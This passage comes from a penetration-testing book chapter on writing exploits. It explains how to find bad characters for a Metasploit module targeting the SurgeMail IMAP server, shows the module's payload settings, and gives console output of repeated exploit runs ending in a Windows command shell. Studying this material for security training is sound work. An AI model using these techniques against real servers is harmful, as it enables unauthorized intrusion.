Creating Your Own Exploits
211
mangled and marking that character as bad. One of the fastest methods,
however, is to find the bad characters in the source code of similar exploits.
For example, a search of the IMAP exploits as of this writing finds
\x00\x09\
x0a\x0b\x0c\x0d\x20\x2c\x3a\x40\x7b
listed as bad characters, as shown next:
'Privileged' => false,
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Payload' =>
{
'Space' => 10351,
'DisableNops' => true,
'BadChars' => "\x00\x09\x0a\x0b\x0c\x0d\x20\x2c\x3a\x40\x7b"
},
'Platform' => 'win',
'Targets' =>
When you declare
'BadChars'
in an exploit module, Metasploit will auto-
matically exclude them from shellcode and from any automatically generated
strings of text or NOPs.
When we run the exploit again, as shown next, after declaring bad char-
acters, we finally get a session on the third try. The exploit still isn’t reliable,
but it works because Metasploit dynamically changes the shellcode each time
the exploit is run. As a result, the characters that are causing the module to
fail may not always be present.
msf exploit(surgemail_book) >
rexploit
[*] Started bind handler
[*] Authenticating as test with password test...
[*] Sending payload
[*] Exploit completed, but no session was created.
msf exploit(surgemail_book) >
rexploit
[*] Started bind handler
[*] Authenticating as test with password test...
[*] Sending payload
[*] Exploit completed, but no session was created.
msf exploit(surgemail_book) >
rexploit
[*] Started bind handler
[*] Authenticating as test with password test...
[*] Sending payload
[*] Command shell session 1 opened (192.168.1.101:59501 -> 192.168.1.155:4444)
(C) Copyright 1985-2001 Microsoft Corp.
c:\surgemail>